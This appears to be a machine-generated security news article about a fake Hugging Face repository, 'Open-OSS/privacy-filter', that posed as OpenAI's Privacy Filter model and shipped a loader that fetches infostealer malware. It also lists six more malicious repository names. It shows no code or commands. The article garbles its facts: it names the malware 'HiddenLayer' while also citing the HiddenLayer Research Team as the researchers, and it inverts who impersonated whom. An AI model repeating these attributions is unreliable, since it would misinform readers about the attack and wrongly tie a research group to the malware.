Ethical Hacking News
A new supply chain attack has emerged, using a malicious Hugging Face repository to distribute a Rust-based information stealer called HiddenLayer. The project impersonated OpenAI's Privacy Filter open-weight model, copying its description verbatim and shipping a loader.py file that fetches and executes infostealer malware on Windows machines. This attack highlights the need for better security measures in place for open-source projects and serves as a wake-up call for developers and users to prioritize authenticity and protect sensitive information.
The Hugging Face repository "Open-OSS/privacy-filter" has been impersonated by a malicious attack dubbed "HiddenLayer." The HiddenLayer attack is a Rust-based information stealer that exploits trust in open-source projects to gain access to sensitive information. Users were tricked into downloading the malicious project, which allowed attackers to bypass security measures and expose their sensitive information. A total of six more repositories have been found with similar malware loaders, suggesting a broader supply chain operation. The attack uses ValleyRAT, a modular remote access trojan distributed via phishing emails and SEO poisoning. Developers and users are advised to exercise extreme caution when interacting with open-source projects and verify their authenticity before use.
The cybersecurity landscape has witnessed numerous attacks in recent times, but a new threat has emerged that is causing significant concern. A malicious Hugging Face repository, masquerading as an open-source project, has taken the platform's trending list by impersonating OpenAI's Privacy Filter open-weight model. This attack, which has been dubbed "HiddenLayer" and "Open-OSS/privacy-filter," has already garnered significant attention due to its sophisticated nature and potential for widespread impact.
According to recent reports, HiddenLayer is a Rust-based information stealer that was distributed through a malicious Hugging Face repository. The project, which was named Open-OSS/privacy-filter, copied the entire description verbatim from OpenAI's legitimate Privacy Filter release and shipped a loader.py file that fetches and executes infostealer malware on Windows machines. This attack exploits the trust that users place in open-source projects, allowing attackers to gain access to sensitive information without being detected.
The malicious project instructs users to clone the repository and run a batch script ("start.bat") for Windows or a Python script ("loader.py") for Linux or macOS systems to configure all necessary dependencies and start the model. This allows the attackers to bypass traditional security measures, such as antivirus software and firewalls, and gain access to sensitive information.
The impact of this attack cannot be overstated. According to HiddenLayer Research Team, the malicious project has already reached the #1 trending position on Hugging Face with approximately 244,000 downloads and 667 likes within 18 hours. This indicates that a significant number of users have been tricked into downloading the malicious project, potentially exposing their sensitive information.
Furthermore, recent analysis has uncovered six more repositories that feature a similar Python loader to deploy the stealer - anthfu/Bonsai-8B-gguf, anthfu/Qwen3.6-35B-A3B-APEX-GGUF, anthfu/DeepSeek-V4-Pro, anthfu/Qwopus-GLM-18B-Merged-GGUF, anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF, and anthfu/supergemma4-26b-uncensored-gguf-v2. These repositories are suspected to be part of a broader supply chain operation targeting open-source ecosystems.
The use of ValleyRAT, a modular remote access trojan that's known to be distributed via phishing emails and search engine optimization (SEO) poisoning, adds another layer of complexity to this attack. According to HiddenLayer, the shared infrastructure suggests these campaigns are possibly linked and likely part of a broader supply chain operation targeting open-source ecosystems.
In light of this new threat, it is essential for developers and users to exercise extreme caution when interacting with open-source projects. Attackers have become increasingly sophisticated in their tactics, making it challenging to distinguish between legitimate and malicious projects. Therefore, it is crucial to verify the authenticity of any project before downloading or using it.
Furthermore, the incident highlights the need for better security measures in place for open-source projects. Hugging Face has since disabled access to the malicious repository, but the damage has already been done. The attack serves as a wake-up call for developers and users alike, emphasizing the importance of staying vigilant and protecting sensitive information from falling into the wrong hands.
In conclusion, the rise of HiddenLayer and Open-OSS/privacy-filter represents a new supply chain attack that has significant implications for the cybersecurity landscape. As open-source projects continue to grow in popularity, it is essential to prioritize security and authenticity to prevent similar attacks in the future.
Related Information:
https://www.ethicalhackingnews.com/articles/A-New-Supply-Chain-Attack-Emerges-The-Rise-of-HiddenLayer-and-Open-OSSprivacy-filter-ehn.shtml
https://thehackernews.com/2026/05/fake-openai-privacy-filter-repo-hits-1.html
https://huggingface.co/mudler/Qwen3.6-35B-A3B-Claude-4.7-Opus-Reasoning-Distilled-APEX-GGUF
https://simonwillison.net/2026/Apr/16/qwen-beats-opus/
https://huggingface.co/anthfu/supergemma4-26b-uncensored-gguf-v2
Published: Mon May 11 04:25:43 2026 by llama3.2 3B Q4_K_M
